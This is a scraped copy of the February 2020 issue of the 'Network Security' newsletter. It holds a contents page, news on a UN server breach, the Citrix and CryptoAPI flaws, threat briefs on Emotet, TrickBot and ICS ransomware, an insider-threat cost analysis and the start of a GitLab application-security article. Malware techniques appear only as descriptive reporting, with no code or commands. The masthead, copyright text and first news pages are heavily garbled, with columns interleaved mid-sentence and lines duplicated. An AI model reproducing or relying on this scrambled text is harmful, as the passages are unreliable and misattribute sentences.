See discussions, stats, and author profiles for this publication at: https://www.researchgate.

net/publication/339371911

Keyloggers: silent cyber security weapons

Article  in  Network Security · February 2020

DOI: 10.1016/S1353-4858(20)30021-0

CITATIONS READS

0 597

2 authors:

Akashdeep Bhardwaj Sam Goundar

University of Petroleum & Energy Studies Victoria University of Wellington
47 PUBLICATIONS   138 CITATIONS    71 PUBLICATIONS   131 CITATIONS   

SEE PROFILE SEE PROFILE

Some of the authors of this publication are also working on these related projects:

Gather details to build a profile about target from Email ID View project

Network Security View project

All content following this page was uploaded by Akashdeep Bhardwaj on 08 March 2020.

The user has requested enhancement of the downloaded file.

 network
July 2017 2020
ISSN 1353-4858 February
SECURITY www.networksecuritynewsletter.com

Featured in this issue: Contents

Reducing risk with end-to-end application security NEWS
automation United Nations covered up hack of dozens
of servers 1

N o one wants to be ‘the person

who got the company hacked’ –
the one who made a simple mistake
remediation and monitoring the appli-
cation’s infrastructure, human error is
removed and consistency is applied. And
Citrix flaw remains critical
NSA finds major Windows bug
2
3
FEATURES
when developing software, such as the best way to reduce the risk of non-
Reducing risk with end-to-end
including a password in the code. compliance with regulatory controls is by application security automation 6
The best way to reduce this kind of automating them and having traceability When developing software, simple mistakes such as
risk is through automation, argues Cindy along the way to capture who changed leaving a password in the code happen every day.
The best way to reduce this kind of risk is through
Blake of GitLab. By automating appli- what, when and why. automation, argues Cindy Blake of GitLab. By auto-
cation security scanning, vulnerability mating application security scanning, vulnerability
Full story on page 6… remediation and monitoring the application’s infra-
structure, human error is removed and consistency
Dissecting .NET ransomware: key generation, is applied. And the best way to reduce the risk of
non-compliance with regulatory controls is by auto-
encryption and operation mating them and having traceability along the way
to capture who changed what, when and why.

T he threat of ransomware is ever-

growing, but not all ransomware
types are created equal. The cryptosys-
provide insights into key generation,
encryption and other aspects of the ran-
somware kill chain. They also summarise
Dissecting .NET ransomware:
key generation, encryption and
operation 8
Not all ransomware types are created equal – the cryp-
tems in some forms are more virulent
than others.
ransomware execution flow and the use
of dynamic library calls. The lessons
Visit us @
tosystems in some forms are more virulent than others.
Pranshu Bajpai and Richard Enbody at Michigan State
University dissect eight real-world variants belonging
www.biometrics-today.com
Pranshu Bajpai and Richard Enbody at learned apply to all forms of ransomware to different families of .NET ransomware and provide
insights into key generation, encryption and other
Michigan State University dissect eight and can be used for building more effec- aspects of the ransomware kill chain. They also sum-
real-world variants belonging to differ- tive ransomware solutions. marise ransomware execution flow and use of dynamic
library calls. The lessons learned apply to all forms of
ent families of .NET ransomware and Full story on page 8… ransomware and can be used for building more effec-
Visit us @
tive ransomware solutions.

Keyloggers: silent cyber security weapons Keyloggers: silent cyber security

www.membrane-technology.com
weapons 14

T he privilege level at which keylog- Pacific, demonstrate how a keylogger Keyloggers are almost impossible to detect and
remove because of the privilege level at which they
gers execute is higher than typical can gather keystrokes and screenshots execute. Dr Akashdeep Bhardwaj of the University of
malware, which makes them almost along with online transactions with- Petroleum & Energy Studies, Dehradun, and Dr Sam
Goundar of the University of South Pacific, propose a
impossible to detect and remove. out a scanner being able to detect it. Visit us @
taxonomy for keyloggers and demonstrate how a key-
logger can gather keystrokes and screenshots along
Dr Akashdeep Bhardwaj of the They also suggest a form of virtual with online transactions without a scanner being able
University of Petroleum & Energy keyboard that could defeat this kind to detect it. They also suggest a form of virtual key-
board that could defeat this kind of malware.
Studies, Dehradun, and Dr Sam of malware.
Goundar of the University of South Full story on page 14… REGULARS
ThreatWatch 3

United Nations covered up hack of dozens of Visit us @

Report Analysis 4
News in brief 5
servers The Firewall 20

U nited Nations (UN) networks in The New Humanitarian, formerly Events 20

Geneva and Vienna were seriously an official UN publication, discovered
compromised in 2019, but the organi- internal reports including a message to
sation chose to keep the incidents internal technical teams that said: “We Visit us @
secret. Continued on page 2... www.networksecuritynewsletter.com

ISSN 1353-4858/20
1353-4858/10 © 2020 2011 Elsevier Ltd. All rights reserved
This publication
journal and and
the individual
the individual
contributions
contributions
contained
contained
in it in
areit protected
are protected
under
under
copyright
copyright
by Elsevier
by Elsevier
Ltd, Ltd,
and and
the following
the following
terms
terms
and and
conditions
conditions
applyapply
to their
to their
use:use:

Visit us @
Photocopying
Single photocopies of single articles may be made for personal use as allowed by national copyright laws. Permission of the publisher and payment of a fee is required for all other photocopying, including multiple
or systematic copying, copying for advertising or promotional purposes, resale, and all forms of document delivery. Special rates are available for educational institutions that wish to make photocopies for non-profit
educational classroom use. www.sealingtechnology.info
 NEWS

...Continued from front page work was breached first and the attackers
Editorial Office: are working under the assumption that used that to pivot to the other systems.
Editorial Office:
Elsevier Ltd
Elsevier Ltd
the entire domain is compromised. The Once the story broke, spokesperson
The Boulevard, Langford Lane, Kidlington,
The Boulevard, Langford Lane, Kidlington,
Oxford, OX5 1GB, United Kingdom
attacker doesn’t show signs of activity Stéphane Dujarric admitted that: “The
Oxford, OX5 1GB, United Kingdom
Fax: +44 (0)1865 843973
Tel: +44 1865 843239
so far, we assume they established their attack resulted in a compromise of core
Web: www.networksecuritynewsletter.com
Web: www.networksecuritynewsletter.com position and are dormant.” infrastructure components,” and “was
Publisher: Greg Valero According to the publication: “Dozens determined to be serious”. However, the
Publishing Director: Sarah Jenkins
E-mail: g.valero@elsevier.com
of UN servers – including systems at its internal report used phrases such as “major
Editor:
Editor: SteveMansfield-Devine
Steve Mansfield-Devine
E-mail:smd@contrarisk.com
smd@contrarisk.com
human rights offices, as well as its human meltdown” and “counting our casualties”.
E-mail:
Senior Editor: Sarah Gordon
resources department – were compro- The report by The New Humanitarian
Columnists: Editoral
International Ian Goslin,Advisory
Karen Renaud,
Board:
mised and some administrator accounts is here: http://bit.ly/2H8CEEe.
Dario Forte, Dave
EdwardSpence, Colin
Amoroso, AT&TTankard
Bell Laboratories; breached.” Although there are no details as Meanwhile, the UN has come in for
Fred Cohen, Fred Cohen
International & Associates;
Editoral Advisory Jon David,
Board:The to what data was compromised, the article a targeted phishing campaign. Malicious
Fortress;
Dario Bill Hancock,
Forte, EdwardExodus Communications;
Amoroso, Ken Lindup,
AT&T Bell Laboratories;
Consultant at Cylink;
Fred Cohen, Dennis&Longley,
Fred Cohen Queensland
Associates; University
Jon David, The
says the internal report “implies that inter- emails were sent to 600 staffers across the
ofFortress;
Technology; Tim Myers,
Bill Hancock, Novell;
Exodus Tom Mulhall; Padget
Communications; Ken nal documents, databases, emails, com- organisation, purporting to come from
Petterson, Martin Marietta; Eugene Schultz, Hightower;
Lindup, Consultant at Cylink; Dennis Longley, Queensland
Eugene Spafford,
University Purdue University;
of Technology; Tim Myers,WinnNovell;
Schwartau, Inter.Pact
Tom Mulhall;
mercial information and personal data may the Permanent Mission of Norway, which
Padget Petterson,
Production Martin Marietta;
Support Manager: EugeneLin Schultz,
Lucas have been available to the intruders”. represents the country at the UN head-
Hightower;E-mail:
Eugenel.lucas@elsevier.com
Spafford, Purdue University; Winn
Schwartau, Inter.Pact
The intrusions affected an estimated quarters in New York. The emails claimed
Subscription
Production Information
Support Manager: Lin Lucas
42 servers in three locations: the UN there was an issue with an attached agree-
An annual subscription
E-mail: to Network Security includes 12
l.lucas@elsevier.com Office in Vienna, the UN Office in ment document. According to security
issues and online access for up to 5 users.
Prices: Geneva, and the UN Office of the firm Cofense, the attachment was a Word
Subscription Information
E1112 for all European countries & Iran High Commissioner for Human Rights document with malicious macros capable
An annual subscription to Network Security includes 12
US$1244 for all countries except Europe and Japan
issues and online access for up to 5 users.
¥147 525 for Japan
Subscriptions run for 12 months, from the date
(OHCHR) headquarters, also in Geneva. of downloading the Emotet malware.
(Prices valid until 31 July 2017)
payment is received.
To subscribe send payment to the address above. The intrusions compromised core
Tel: +44 (0)1865 843687/Fax: +44 (0)1865 834971
More information: www.elsevier.com/journals/
Email: commsales@elsevier.com,
institutional/network-security/1353-4858
infrastructure systems, including user Citrix flaw remains
and password management and firewalls.
or via www.networksecuritynewsletter.com
Subscriptions run for 12 months, from the date payment is
Permissions may be sought directly fromatElsevier Global Rights Staff were told to change their passwords critical
received. Periodicals postage is paid Rahway, NJ 07065,

T
Department, PO Box
send800, Oxford OX5 1DX, UK; phone:
to:+44 1865
USA. Postmaster
843830,365
fax: +44 1865
all USA
853333,
address
email:NJ
corrections Network
permissions@elsevier.com. You
but were not informed about the breach, he critical vulnerability affecting
Security, Blair Road, Avenel, 07001, USA
may also contact Global Rights directly through Elsevier’s home page nor that there was the potential that the Citrix Application Delivery
(www.elsevier.com), selecting first ‘Support & contact’, then ‘Copyright
Permissions may be sought directly from Elsevier Global Rights
& permission’. In the USA, users may clear permissions and make personal data had been put at risk. One Controller (ADC) and Gateway (CVE-
Department, PO Box 800, Oxford OX5 1DX, UK; phone: +44 1865
payments through the Copyright Clearance Center, Inc., 222
843830, fax: +44 1865 853333, email: permissions@elsevier.com. You
Rosewood Drive, Danvers, MA 01923, USA; phone: +1 978 750
claim suggested that as much as 400GB 2019-19781) is still a major cause for
may also contact Global Rights directly through Elsevier’s home page
8400, fax: +1 978 750 4744, and in the UK through the Copyright
(www.elsevier.com), selecting first ‘Support & contact’, then ‘Copyright
of data had been exfiltrated from the concern even though the flaw has
Licensing Agency Rapid Clearance Service (CLARCS), 90 Tottenham
& permission’. In the USA, users may clear permissions and make
Court Road, London W1P 0LP, UK; tel: +44 (0)20 7631 5555; fax: servers, possibly including staff records, been patched.
payments through the Copyright Clearance Center, Inc., 222 Rosewood
+44 (0)20 7631 5500. Other countries may have a local repro-
Drive, Danvers, MA 01923, USA; phone: +1 978 750 8400, fax: +1 978 health insurance and commercial con- According to Positive Technologies,
graphic rights agency for payments.
750 4744, and in the UK through the Copyright Licensing Agency Rapid
Clearance Service (CLARCS), 90 Tottenham Court Road, London W1P
tract data, although the UN claimed that the security company that revealed the
Derivative Works
0LP, UK; tel: +44 (0)20 7631 5555; fax: +44 (0)20 7631 5500. Other
Subscribers may reproduce tables of contents or prepare lists
no important data was accessed. issue, more than six weeks after the
countries may have a local reprographic rights agency for payments.
of articles including abstracts for internal circulation within their
Derivative Works “Although hackers accessed a self-con- threat became public knowledge, nearly
institutions. Permission of the Publisher is required for resale or
Subscribers may reproduce tables of contents or prepare lists of arti-
distribution outside the institution. Permission of the Publisher tained part of our system in July 2019, one in five (19%) of organisations has
cles including abstracts for internal circulation within their institutions.
is required for all other derivative works, including compilations
Permission of the Publisher is required for resale or distribution outside
and translations.
the development servers they accessed did yet to implement the patches. That rep-
the institution. Permission of the Publisher is required for all other
derivative works, including compilations and translations.
not hold any sensitive data or confidential resents around 15,000 organisations that
Electronic Storage or Usage
Electronic Storage or Usage
Permission of the Publisher is required to store or use electronically information,” said a UN statement. “The are still at risk. And the flaw is under
Permission of the Publisher is required to store or use electronically
any material contained in this publication, including any article or
any material contained in this journal, including any article or part of hackers did manage to access our Active active attack in the wild.
part of an article. Except as outlined above, no part of this publica-
an article. Except as outlined above, no part of this publication may
tion may be reproduced, stored in a retrieval system or transmitted
be reproduced, stored in a retrieval system or transmitted in any form
User Directory, which contains the user Some system administrators may find
in any form or by any means, electronic, mechanical, photocopying,
or by any means, electronic, mechanical, photocopying, recording or
recording or otherwise, without prior written permission of the
IDs for our staff and devices.” that the flaw has already been patched for
otherwise, without prior written permission of the Publisher. Address
Publisher. Address permissions requests to: Elsevier Science Global
permissions requests to: Elsevier Science Global Rights Department, at The internal report, dated 20 them – by hackers. According to FireEye,
Rights Department, at the mail, fax and email addresses noted above.
the mail, fax and email addresses noted above. September 2019, suggests the breaches a hacking group dubbed NotRobin is
Notice
Notice
No responsibility is assumed by the Publisher for any injury and/or dam-
No responsibility is assumed by the Publisher for any injury and/
occurred two months earlier. The entry bundling mitigation code with its exploits.
age to persons or property as a matter of products liability, negligence
or damage to persons or property as a matter of products liability,
or otherwise, or from any use or operation of any methods, products,
point seems to have been a known vul- This allows them to install malware, such
negligence or otherwise, or from any use or operation of any meth-
instructions or ideas contained in the material herein. Because of
ods, products, instructions or ideas contained in the material herein. nerability in Microsoft SharePoint (CVE- as backdoors, on a vulnerable system, then
rapid advan­ ces in the medical sciences, in particular, independent
Because of rapid advan­ces in the medical sciences, in particular,
verification of diagnoses and drug dosages should be made. Although 2019-0604). A patch had been available close off the vulnerability so that it can’t be
independent verification of diagnoses and drug dosages should be
all advertising material is expected to conform to ethical (medical)
made. Although all advertising material is expected to conform to
standards, inclusion in this publication does not constitute a guarantee
for months before the breach but the used by other cyber criminals.
ethical (medical) standards, inclusion in this publication does not
or endorsement of the quality or value of such product or of the claims
constitute a guarantee or endorsement of the quality or value of
UN had not applied it to the breached “The mitigation works by delet-
made of it by its manufacturer.
such product or of the claims made of it by its manufacturer. systems. Widely available exploits for this ing staged exploit code found within
vulnerability allow attackers to bypass NetScaler templates before it can be
12987
Pre-press/Printed by
Digitally Produced by
authentication and perform system-level invoked,” the FireEye report explains.
Mayfield Press (Oxford) Limited
Mayfield Press (Oxford) Limited commands. It seems that the Vienna net- “However, when the actor provides the

2
Network Security February 2020

Emotet wifi attack
The infamous Emotet trojan now has a new
worm-like module that allows the malware
to spread via insecure wifi networks, accord-
ing to researchers at Binary Defense. Once
established on a wifi-enabled computer, this
new strain uses calls to wlanAPI.dll in an
attempt to discover nearby wireless networks.
If these are password protected, it will attempt
to brute force a connection. Once on the wifi
network, the malware looks for other Windows
machines with non-hidden shares, scans for
all users on those devices and tries to brute
force its way into administrator accounts. If
successful, it installs a service called ‘Windows
Defender System Service’ to achieve persis-
tence on the system. There’s more information
here: http://bit.ly/2urMdf6.
Motherboard flaw
A long-deprecated driver for old versions of
Gigabyte PC motherboards is being exploited
by attackers to hijack Windows systems, dis-
able anti-malware defences and install ran-
somware. Sophos discovered the read-write
flaw – which it has dubbed RobbinHood – in
a driver that Gigabyte stopped shipping and
supporting some time ago but which still has
a valid cryptographic signature. By using the
hardcoded key during subsequent exploi-
tation, NotRobin does not remove the
payload. This lets the actor regain access
to the vulnerable device at a later time.”
The FireEye report is here: http://bit.
ly/2OI0oDx.
FireEye also said there have been
reports of attackers exploiting the flaw
to install the Ragnarok ransomware and
cryptomining malware. “Based on our
initial observations, the ultimate intent
may have been the deployment of ran-
somware, using the Gateway as a central
pivot point,” the firm said.
FireEye has worked with Citrix to
develop a scanner that can detect com-
promised appliances. This is based on
indicators of compromise gathered dur-
ing incident response engagements.
“The goal of the scanner is to analyse
available log sources and system forensic
artefacts to identify evidence of success-
ful exploitation of CVE-2019-19781,”
Citrix said. “There are limitations in
what the tool will be able to accomplish,
and therefore, executing the tool should
not be considered a guarantee that a
February 2020 Network Security
Threatwatch
driver as a vector, anti-malware systems ignore
the malware because it appears legitimate.
The attackers then use this approach to load a
second, unsigned driver that enables the ran-
somware. The flaw affects Windows 7, 8 and
10 machines. There’s more information here:
http://bit.ly/2UDk3s9.
ICS ransomware
A new strain of ransomware has features
designed specifically to attack organisations
running industrial control system (ICS)
devices, according to security firm Dragos.
Although it mostly functions like any other
ransomware – encrypting files and display-
ing a ransom message – it also comes with
a ‘kill list’ of ICS-specific processes that it
attempts to shut down. These include pro-
cesses relating to ICS products such as GE’s
Proficy data historian, the GE Fanuc licens-
ing server, Honeywell’s HMIWeb application
and the ThingWorx Industrial Connectivity
Suite, as well as a number of other remote
monitoring and licensing server solutions.
Dragos describes the malware as primitive,
but warns that it still represents “specific and
unique risks and cost-imposition scenarios for
industrial environments”. There’s more infor-
mation here: http://bit.ly/31GJ9b4.
system is free of compromise.”
The tool is available on GitHub here:
https://github.com/citrix/ioc-scanner-
CVE-2019-19781.
The US Cybersecurity and
Infrastructure Security Agency (CISA),
part of the Department of Homeland
Defense, has also released details on how
to detect vulnerable systems. The details
are here: www.us-cert.gov/ncas/alerts/
aa20-031a.
NSA finds major
Windows bug
M icrosoft has patched a major flaw
in the CryptoAPI functionality of
Windows 10 and Server 2016. But aside
from the serious nature of the vulner-
ability, what makes this bug interesting
is that the firm was alerted to it by the
US National Security Agency (NSA).
The NSA has gained a certain notorie-
ty for keeping details of exploitable soft-
ware flaws to itself, so that it can exploit
them for its own intelligence-gathering
operations. In this instance, however,
NEWS/THREATWATCH
TrickBot UAC evasion
The TrickBot trojan has adopted a new way of
bypassing Windows 10 User Account Control
(UAC) mechanisms so that it can be installed
with no user warnings. Now, when the
malware is being installed on a PC, it checks
to see if the OS is Windows 7 or Windows 10.
If the former, it uses the existing CMSTPLUA
UAC bypass method. If Windows 10, it makes
use of the fodhelper.exe program – a trusted
binary in the Windows system that is used to
execute code with administrator privileges. The
ability to exploit this part of the OS to bypass
UAC was discovered back in 2017. There’s
more information here: http://bit.ly/37c2kuo.
Metamorfo targets banks
A new version of the Metamorfo banking
trojan is casting its net wider. Unlike an ear-
lier version, which focused purely on banks
in Brazil, the second strain is targeting the
customers of financial institutions in multiple
countries, researchers at Fortinet have warned.
The firm discovered the trojan being distrib-
uted as an MSI file hidden in a Zip archive.
This file is automatically executed by MsiExec.
exe in Windows if a user double-clicks on the
file. There is a full analysis here: http://bit.
ly/38lBt0c.
the agency seems to have regarded the
vulnerability as so serious that it was
critical that Microsoft fixed it. The bug
has been dubbed ‘CurveBall’ and proof-
of-concept exploits were released by
security researchers within 24 hours of
the announcement.
The vulnerability (CVE-2020-0601)
allows attackers to disguise malware as
legitimate, signed software as well as
spoofing X.509 certificate chains for other
forms of attack. This could allow for the
interception and modification of TLS-
encrypted communications, such as web
sessions. And, by bypassing authentication,
it could allow for remote code execution.
According to the NSA: “The conse-
quences of not patching the vulnerabil-
ity are severe and widespread. Remote
exploitation tools will likely be made
quickly and widely available. Rapid
adoption of the patch is the only known
mitigation at this time and should be the
primary focus for all network owners.”
There’s more information here: http://
bit.ly/2UGlK80 and here: http://bit.
ly/2OF3W9K.
3
 NEWS
Report Analysis
IBM/ObserveIT: Cost of Insider Threats
2020
W hen Michael Corleone says “keep your friends close but your enemies
closer” in The Godfather Part II (a quote often misattributed to Sun
Tzu, Machiavelli or Petrarch) he clearly didn’t have computers in mind. But
the truth is that, for most organisations, their biggest threat is already as
close as it can be – their own staff.
NSA whistleblower Edward Snowden could
be regarded as the poster boy for the insider
threat. He was someone with access to
extremely sensitive data and harboured an
agenda entirely unknown to his employers.
However, Snowden was an extreme case and
the reality of the insider threat is far more
banal, even while it remains potentially
highly damaging.
The truth is that in the majority of insid-
er incidents, there is no malice, political
motivation or financial incentive involved.
The largest category of such events is
explained by factors that are far more mun-
dane – incompetence, thoughtlessness and
simple accidents.
This research, sponsored by IBM Security
and ObserveIT and carried out by the
Ponemon Institute, breaks down insider
threats into three main classes: employee or
contractor negligence; criminal and malicious
insiders; and credential theft, which it also
calls imposter risk as the misuse of credentials
usually involves the attacker pretending to be
someone they’re not. The data is based on
actual incidents.
The first group is by far the most com-
mon. Out of 4,716 incidents included in the
survey, 2,962 (63%) were the result of negli-
gence. What’s clearly evident from the data,
however, is that the number of incidents is
Frequency of
occurrence for the
three main cat-
egories of insider
incidents. Source:
IBM/ObserveIT/
Ponemon Institute.
4
Network Security February 2020
increasing in all three categories. In fact, over
the past three years, the average number of
credential theft incidents per company has
more than tripled.
So should organisations focus on training
their employees so that they are less care-
less? Well, it’s not that clear-cut. When it
comes to how much a single incident costs
the company, the theft of credentials is by
far the most expensive. The average cost for
credential theft has risen from $493,093 in
2016 to $871,686 in 2019. Criminal and
malicious insiders cost the organisation a
little less – an average of $756,760 per inci-
dent, while incidents arising from negligence
run up an average bill of $307,111.
The big picture is that, yes, negligence
is still the biggest cost because it’s the
most frequent kind of insider incident
and so represents a cost to organisations
of $4.58m. However, while criminal and
malicious insiders are not encountered as
frequently as incompetent employees, the
overall cost is still $4.08m – not far behind.
The overall cost of credential theft is
$2.79m, which still looks bad on the
balance sheet.
All of these figures include monitoring
and surveillance, investigation, escalation,
incident response, containment, ex-post
analysis and remediation.
There have been plenty of warnings
from the information security community
about the insider threat and this message is
hitting home to some degree. The report
finds that 60% of the organisations studied
have increased their spending on the insider
threat since 2016, and 25% increased
budgets between 2018 and 2019. Detection
systems and investigation costs are driving
these increases, with investigation expenses
alone having increased 86% over the past
three years.
Not surprisingly, user training and aware-
ness come at the top of the list of tools and
activities that organisations are deploying
to counter this problem. Data loss preven-
tion and user behaviour analytics come
close behind, suggesting that organisations
feel that technological solutions have a big
role to play. Employee monitoring and sur-
veillance are popular approaches, too. It’s
perhaps surprising, though, to see privileged
access management come fairly low on the
list – being used by about two-fifths of firms.
Given the cost of credential-based incidents,
this deserves to play a much bigger role.
In some ways, insider attacks are like
any other – most organisations are pretty
poor at detecting and containing them.
And the longer it takes you to get things
under control, the more it’s going to
cost you. On average, if an organisation
contains the incident within 30 days, it's
likely to face a bill of $7.12m. If it takes
90 days, that number will almost double
to $13.71m. Typical incidents are some-
where in between, with organisations tak-
ing an average of 77 days to get on top of
the incident.
The cost also depends on which indus-
try you’re in and how big you are. Firms
with fewer than 500 staff spent, on aver-
age, $7.68m on each insider incident in
the past year, while for enterprises with
headcounts above 75,000 the cost was
$17.92m. Financial services firms paid out
$14.5m, for energy and utilities companies
the figure was $11.54m and for retail firms
it was $10.24. In all three of those sectors,
the costs have risen over the past two years,
with retail facing the biggest hike at 38.2%.
The report is available here: https://ibm.
co/31vrXFm.

In brief
US blames China for Equifax hack
The US Department of Justice (DOJ) has now
officially blamed China for the massive breach
of credit-reporting firm Equifax, which was
publicly revealed in September 2017. The DOJ
has issued indictments against nine people,
including four members of China’s People’s
Liberation Army, making it clear that the US
considers this to have been a nation-state attack.
The breach exploited flaws in the Apache Struts
Framework, which Equifax had failed to patch.
Having established a foothold on the system, the
attackers ran around 9,000 SQL queries against
Equifax’s databases, exfiltrating huge amounts
of data that they split into smaller chunks in
order to avoid triggering alerts. Some 34 serv-
ers in 20 countries were used by the hackers in
order to make it difficult to pinpoint the origin
of the attack. There’s more information here:
http://bit.ly/2UGZ6MY.
Iran attack
According to NetBlocks, which monitors
Internet access globally, Iran suffered a major
outage on 8 February 2020, with as much as a
quarter of the country losing access. This was
most likely due to the country’s authorities
activating the DZHAFA defence mechanism
– sometimes described as a ‘digital fortress’ –
which was invoked to counter a distributed
denial of service (DDoS) attack on the country’s
infrastructure. There’s more information here:
http://bit.ly/2SzGgVf.
Cisco flaw
Five critical flaws have been discovered in the
Cisco Discovery Protocol (CDP) that poten-
tially threatens millions of devices – including
switches, routers, IP phones and cameras – and
the networks to which they are connected.
Security firm Armis discovered the threat, which
it has dubbed ‘CDPwn’, which, it said, could be
used as an entry point to enterprise networks
running a wide variety of Cisco products. CDP
is used to find and manage these products on
the network, but the flaws allow the devices to
be controlled by an attacker with no authentica-
tion required. In particular, the vulnerabilities
could override network segmentation and pro-
vide a route for data exfiltration. There’s more
information here: www.armis.com/cdpwn/.
TCG IoT guidelines
The Trusted Computing Group (TCG) has
issued new guidelines and best practices for how
vendors should handle software and firmware
updates in Internet of Things (IoT) products
and other embedded devices. According to the
TCG, attackers constantly target the firmware
and software in embedded systems, such as
appliances and connected door locks, searching
for vulnerabilities to exploit in order to establish
February 2020 Network Security
a permanent foothold on the device. “As a result,
designers of embedded systems (ordinary items
with an embedded computer) must be prepared
to deliver firmware and software updates that
customers must promptly install to ensure that
these connected devices remain secure,” said the
organisation. The guidelines are available here:
http://bit.ly/2w8DNtp.
Cracked software loaded with malware
Although it’s not news that ‘cracked’ software –
illegal copies of commercial packages modified
to evade the need for genuine licences – often
comes with embedded malware, researchers
from Cybereason have warned that a recent
campaign is loading the code with “an arsenal of
malware”, including credential stealers, crypto-
currency miners, ransomware and crypto-coin
stealers. The malware also has the ability to use
the cameras on victims’ systems. Worse, the
attackers are using Bitbucket repositories to host
additional payloads for the malware. By using
a legitimate service like this, they are able to
bypass many enterprise defences. There’s more
information here: http://bit.ly/2vooPim.
Likud leak
A flaw in an app produced by Israel’s Likud
party, headed by Prime Minister Benjamin
Netanyahu, has leaked the personal information
of all of the country’s registered voters – more
than six million citizens. The app, Haaretz
(Elector), is used by the party on voting days.
Likud incorporated the voter register database
into the app, but failed to secure the data,
making it available to anyone. The information
included full names, identity card numbers,
addresses, genders, phone numbers, and other
personal details. Likud said it has now secured
the information, but there’s no way of knowing
how many people might have downloaded it.
Russia blocks Proton
ProtonMail, the end-to-end encrypted email
service, and its sister service ProtonVPN, have
been blocked in Russia. This is in response to
the company, which is based in Switzerland,
refusing to comply with new requirements that
it register its services with state authorities –
now mandatory for all VPN providers – and
provide access to user information. Proton has
advised its users in the Russian Federation to
use the Tor browser to access its services.
Meanwhile, the Russian Government is
threatening Facebook and Twitter with fines
following their refusal to abide by a Russian
law that dictates that databases providing
services to people in Russia must be based on
servers in the country. The law also requires
that the companies provide user information
to the authorities on demand. Although the
threatened fines, of up to $94,000, are rela-
NEWS
tively trivial, further failure to comply with the
law could result in the services being banned in
the country, as happened to LinkedIn in 2015.
Pen-test results
The latest version of Bulletproof’s ‘Annual
Cyber Security Industry Report’, based on data
from the firm’s penetration testing and security
operations centre (SOC) teams, claims that a
fifth of pen tests revealed a critical risk in need
of immediate remediation. The results show
that the most pervasive of critical flaws, offering
hackers an easy opening into an environment,
are outdated or unsupported components. And
the majority of risks identified are those that
need urgent attention, with medium risks out-
numbering low-risk issues. There were around
15,000 events per second and billions of logs
each month, with more than half being related
to user activity. The report is available here:
http://bit.ly/39sXXNg.
Gallery under fire
London’s National Portrait Gallery blocked
347,602 emails containing spam, phishing and
malware attacks in the final quarter of 2019,
according to official figures. The data, obtained
under the Freedom of Information Act by the
Parliament Street think tank, underlines the
threat posed to the capital’s museums by mali-
cious hackers who are intent on stealing mem-
bership data from tourist hotspots. Just over half
(56%) of the blocked emails were identified as
directory harvest attacks (DHAs) in which attack-
ers attempt to determine the validity of email
addresses of employees or individuals associated
with an organisation’s server so that they can be
added to a spam database. Additionally, 61,710
emails were blocked as the sender belonged to
a ‘threat intelligence blacklist’. The National
Portrait Gallery receives up to two million visi-
tors a year, and some of their private information,
such as payment details and email addresses, is
stored on its servers.
Twitter API abused
A flaw in Twitter’s API has been exploited to
patch telephone numbers against usernames.
Security researcher Ibrahim Balic said he had
managed to make 17 million such matches
by automatically generating two billion phone
numbers and then attempting to match them to
users. This was possible because Twitter provides
a feature through which users can upload their
address books in order to find friends on the
service. But Twitter failed to limit requests in its
API. In addition to Balic’s research, Twitter said
it witnessed a high volume of requests coming
from IP addresses in Iran, Israel, and Malaysia
and said that, “it is possible that some of these
IP addresses may have ties to state-sponsored
actors”. The flaw has now been fixed.
5
 FEATURE
Reducing risk with
end-to-end application
security automation
Cindy Blake, GitLab
No one wants to be ‘that guy’ – the one that got the company hacked. The
one who made a simple but stupid mistake when developing a new software
application, such as including a password in the code.
Except for nefarious insiders, IT people
don’t wake up and say: ‘Hmm, I think
I’ll create a software vulnerability today,
or misconfigure a cloud or container set-
ting, leaving a gaping hole for attackers’.
Yet it happens every day. Usually it’s a
case of poor hygiene – like not applying
a security patch or ignoring a critical
software vulnerability. Sometimes it’s
due to ignorance or misinformation,
such as believing that applications run-
ning in containers or on cloud services
are inherently more secure.
The best way to reduce application
security risk from ignorance and neglect
is through automation. By automating
application security scanning, vulner-
ability remediation and monitoring the
application’s infrastructure, the element
of human error is removed and con-
sistency is applied. Auditors love the
approach because it enforces security
policies and exceptions can be easily
identified and documented.
Similarly, the best way to reduce the
risk of non-compliance with regulatory
controls is by automating the controls
and having traceability along the way to
capture who changed what, when and
why. Building this approach into the
company’s software development lifecy-
cle (SDLC) ensures that policies are con-
sistently applied to every project.
Crossing the silos
So why do more enterprises not embrace
this approach? Application security is
hard. The required products are expen-
sive and demand integration of both
6
Network Security February 2020
technology and processes. Furthermore,
the tools and the processes must go hand
in hand, and in the case of applications,
that means crossing the organisation’s
key functional silos of development,
security and operations. Siloed tools
mean the teams lack the means to col-
laborate.
Modern software development com-
pounds these challenges. Security teams are
challenged to meet the scale and velocity of
agile development methods. Code changes
faster and faster, with more open source,
more APIs and more microservices. The
enterprise’s development costs can explode
unpredictably when application security
testing charges by each application and
when single applications are broken into
multiple microservices (essentially in the
case of mini apps).
In addition, iterative development
is incongruent with full application
security scans. Typically, applications
are scanned during testing, especially
dynamic application security testing
(DAST), which requires a fully function-
ing application in order to perform the
test. Any security tests that must by defi-
nition wait to be run until code changes
are merged into the larger code base will
inherently become a bottleneck. Once
in production, cloud native applications
that use containers and orchestrators
present entirely new attack surfaces as
well. Agile development and the holy
grail of DevSecOps doesn’t scale without
developer enablement, automation, and
exception-based security.1
It’s no longer a matter of simply
throwing tools or services at an app
Cindy Blake
to identify vulnerabilities. In his key-
note at the 2019 RSA Conference,
VMWare’s CISO Alex Tosheff said:
“Your most important security product
won’t be a security product.” He is
absolutely right. If we rethink security
as more of an outcome and less as a
tool or a department, we can achieve a
state where security is integrated direct-
ly into the SDLC and where compli-
ance and its auditability are byproducts
of comprehensive automation.
End-to-end application security needs
to automate these four elements:
• Application security testing and reme-
diation.
• Application infrastructure security.
• Policy compliance and auditability.
• SDLC platform security.
Application testing and
remediation
So often development teams get so
focused on one aspect of security or one
set of mission-critical applications that
we go very deep on those protections
and leave many other, sometimes obvi-
ous, aspects completely exposed. It’s like
putting multiple locks on your door and
leaving your window wide open. For
instance, are you using a very powerful
scanner for your mission-critical apps but
not scanning others? Or not scanning
your third-party code because you expect
it’s in widespread use so has already been
checked out (think Apache Struts 2)?
The key recommendations here are:
• Go broad, not deep, when testing
applications. What good is it to find
10,000 vulnerabilities if you lack the

How application
scanning makes
auditors happy
Often an enterprise will stitch together
a variety of tools to create an end-to-
end DevOps tool chain. Then they try
to integrate application security tools.
It gets ugly. This was the challenge for
a software company whose technology
provides real-time location tracking for
retailers and home service providers.
It had a complex developer tech stack
with over 20 distinct tools that was
hard to maintain and manage. Teams
spent several hours a week keeping
tools running, rather than shipping
innovation to their app. The firm took
a different path and moved to one tool
for the entire software development
life cycle (SDLC).
